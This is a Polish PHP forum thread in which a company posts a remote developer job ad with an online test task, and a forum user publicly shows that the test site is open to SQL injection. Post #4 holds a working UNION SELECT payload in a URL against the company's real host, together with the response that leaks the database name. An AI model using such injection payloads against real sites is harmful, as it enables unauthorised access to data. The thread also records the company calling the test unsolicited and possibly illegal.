Witaj Gościu! ( Zaloguj | Rejestruj )

Forum PHP.pl

> [Zdalna/Będzin] - Programisty PHP5, ExtJS, Mysql do stałej współpracy
Proffnet
post
Post #1





Grupa: Zarejestrowani
Postów: 3
Pomógł: 0
Dołączył: 18.09.2013

Ostrzeżenie: (0%)
-----


Firma ProffNet sp. z o.o. poszukuje programistów do stałej współpracy przy realizacji bieżących zadań.

Co oferujemy:
- Możliwość pracy zdalnej lub nowoczesnym biurze firmy w Będzinie
- Szkolenia produktowe, pozwalające na skuteczne wykonywanie powierzonych zadań.
- Atrakcyjne wynagrodzenie.
- Dodatkowe gratyfikacje wynikające wykazanego zaangażowania i terminowości wykonywanych zadań
- Rozliczenia na zasadzie umowy zlecenie, umowy o dzieło lub umowy o współpracy (na podst. Faktur Vat)
- Stałą i stabilną współpracę.
- Terminowe wypłacanie należności za wykonane zlecenia.


Do zadań osób współpracujących będzie należało:
1. Utrzymanie i rozbudowa autorskiego oprogramowania klasy CMMS w tym:
- dostosowywanie oprogramowania do bieżących potrzeb klientów
- debugowanie i bieżąca aktualizacja oprogramowania
- dopisywanie nowych modułów programu
- re-faktoryzacja kodu
- tworzenie bieżącej dokumentacji

2. Modyfikacja istniejących templatek sklepów i stron www opartych o autorski system uniPanel.

3. Drobne aktualizacje istniejących stron www dotychczasowych klientów

Aby skutecznie realizować powierzone zadania wymagana będzie wiedza z zakresu posługiwania się:
- PHP 5
- Framework javascript ExtJS
- Javascript
- Umiejętności czytania dokumentacji
- CSS3
- MySql
- NetBeans, Eclipse, itp..
- Repozytorium Git

Możliwość rozszerzenia zakresu zleceń ułatwi również znajomość
- Java Play Framework

Informacje o wynagrodzeniu
Wynagrodzenie rozliczane będzie jako wypadkowa stawki godzinowej oraz szaczowanej ilości godzin roboczych spędzonych nad poszczególnymi zadaniami.
Wysokość stawki godzinowej jest bezpośrednio uzależniona od doświadczenia kandydata.
Prosimy o podawanie w ofercie proponowanych stawek godzinowych.

Pod uwagę będą brane TYLKO kandydatury osób które prześlą na adres praca(at)proffnet.com:
1. Propozycje rozwiązania zadania znajdującego się na stronie: http://www.zadanie-testowe.proffnet.com/ oraz czas w jakim zadanie zostało przez nich wykonane.
2. Informacje na temat przebiegu dotychczasowej działalności wraz z listą projektów z ich udziałem i zakresem swojej pracy w danym projekcie
3. Ilości godzin w miesiącu, które są w stanie poświęcić na pracę zdalną (lub w naszym biurze)
4. Proponowaną stawkę za godzinę roboczą

Dane firmy:

Biuro
al. Kołłątaja 46
42-500 Będzin

Siedziba
Proffnet Sp. z o.o.
ul. Przedziałowa 24
42-523 Dąbrowa Górnicza
Nip: 629-244-69-63;
Regon: 241719977;
KRS: 0000365205

Ten post edytował Proffnet 18.09.2013, 09:25:05
Go to the top of the page
+Quote Post
 
Start new topic
Odpowiedzi (1 - 5)
redeemer
post
Post #2





Grupa: Zarejestrowani
Postów: 915
Pomógł: 210
Dołączył: 8.09.2009
Skąd: Tomaszów Lubelski/Wrocław

Ostrzeżenie: (0%)
-----


Gratuluję, bo mimo używania PDO zadanie testowe posiada błędy typu SQL injection.
Go to the top of the page
+Quote Post
Proffnet
post
Post #3





Grupa: Zarejestrowani
Postów: 3
Pomógł: 0
Dołączył: 18.09.2013

Ostrzeżenie: (0%)
-----


@redeemer
Wydaje Pan dosyć pochopne osądy, nie wiedząc jak działa Request::getParameter.

Proszę mi wierzyć, że SQL injection nie zadziała w tym przypadku.

Zapraszam do rozwiązania testu. Jeśli uważa się Pan za osobę bieglą w php i javascript (i umiejącą czytać dokumentacje do ExtJs w wypadku braku znajomości tego framework'a) rozwiązanie testu nie powinno zająć Panu więcej niż 5 minut.

Wynik testu proszę przesłać na praca(at)proffnet.com może uda nam się z pożytkiem dla Pana wykorzystać Pańską wiedzę i doświadczenie.

Ten post edytował Proffnet 18.09.2013, 12:19:34
Go to the top of the page
+Quote Post
redeemer
post
Post #4





Grupa: Zarejestrowani
Postów: 915
Pomógł: 210
Dołączył: 8.09.2009
Skąd: Tomaszów Lubelski/Wrocław

Ostrzeżenie: (0%)
-----


To prawda, że nie wiem dokładnie jak działa Request::getParameter, jednak nie zmienia to faktu, że skrypt jest podatny na SQL injection.

Dowód:
Kod
http://www.zadanie-testowe.proffnet.com/?_dc=1379503543121&request=grid%2Fdefault&page=2&start=1%20union%20select%20database(),0x73716c20696e6a656374696f6e,3,4%20--%20&limit=costamcostam&sort=%5B%7B%22property%22%3A%22tst_continent%22%2C%22direction%22%3A%22ASC%22%7D%5D

Zwrot:
Kod
<rs>
<total>
<![CDATA[ 19 ]]>
</total>
<r>
<tst_id>
<![CDATA[ 1 ]]>
</tst_id>
<tst_continent>
<![CDATA[ Afryka ]]>
</tst_continent>
<tst_country>
<![CDATA[ Algieria ]]>
</tst_country>
<tst_capital>
<![CDATA[ Algier ]]>
</tst_capital>
</r>
<r>
<tst_id>
<![CDATA[ baza58949_zadtest ]]>
</tst_id>
<tst_continent>
<![CDATA[ sql injection ]]>
</tst_continent>
<tst_country>
<![CDATA[ 3 ]]>
</tst_country>
<tst_capital>
<![CDATA[ 4 ]]>
</tst_capital>
</r>
</rs>

Jeżeli polegacie tylko na funkcji Request::getParameter jeśli chodzi o bezpieczeństwo to polecam ją albo udoskonalić, albo lepiej użyć PDO do zabezpieczenia przed tego typu atakami.

Ten post edytował redeemer 18.09.2013, 12:41:39
Go to the top of the page
+Quote Post
Proffnet
post
Post #5





Grupa: Zarejestrowani
Postów: 3
Pomógł: 0
Dołączył: 18.09.2013

Ostrzeżenie: (0%)
-----


Witam ponownie

Ma Pan rację co do konkretnego powyższego zapytania. Jednakże proszę zauważyć, iż skrypt ten jest pisany do celów wyłącznie rekrutacyjnych, bez zbędnych linijek kodu które w tym wypadku nic by nie wniosły - jak sam Pan raczył zauważyć, działa także na wyizolowanej bazie danych oraz jest wystawiane jako white-box.

Nie wiem czy jest Pan tego świadomy skrypt ten jednocześnie spełnił swoją rolę - pozyskując ludzi takich jak Pan do konwersacji. Z jednej strony złamał Pan prawo wykonując niezamówione pentesty naszego skryptu/serwera, z drugiej byliśmy w pełni świadomi tego typu działania ze strony takich ludzi jak Pan, choć spodziewaliśmy się działania typu wysłanie wiadomości na priv, a nie publicznego obnażania, co było poniekąd niegrzeczne z pańskiej strony. A jak wiemy kolejność powinna być odwrotna, co nakazuje nam czysta przyzwoitość.

Pomijając ten fakt, wszyscy jesteśmy tylko ludzi panie Marcinie - proszę o tym nie zapominać.

Proponuję Panu więc jeszcze raz skorzystać z naszej oferty, być może będzie miał Pan okazję legalnego potestowania naszego kodu (IMG:style_emoticons/default/wink.gif) Widzimy że jest Pan człowiekiem posiadającym pewną wiedzę i obym się nie mylił skory do owocnej współpracy, lecz aby była zadość formalnością proszę poprawnie rozwiązać zadanie.
Go to the top of the page
+Quote Post
Damonsson
post
Post #6





Grupa: Zarejestrowani
Postów: 2 355
Pomógł: 533
Dołączył: 15.01.2010
Skąd: Bydgoszcz

Ostrzeżenie: (0%)
-----


*formalnościom - Nie mogłem się powstrzymać.

Cytat
Proszę mi wierzyć, że SQL injection nie zadziała w tym przypadku.


Cytat
Proszę mi wierzyć, będzie Pan u nas zarabiał xxxx zł


heheszki (IMG:style_emoticons/default/smile.gif)
Go to the top of the page
+Quote Post

Reply to this topicStart new topic
2 Użytkowników czyta ten temat (2 Gości i 0 Anonimowych użytkowników)
0 Zarejestrowanych:

 



RSS Aktualny czas: 22.12.2025 - 21:55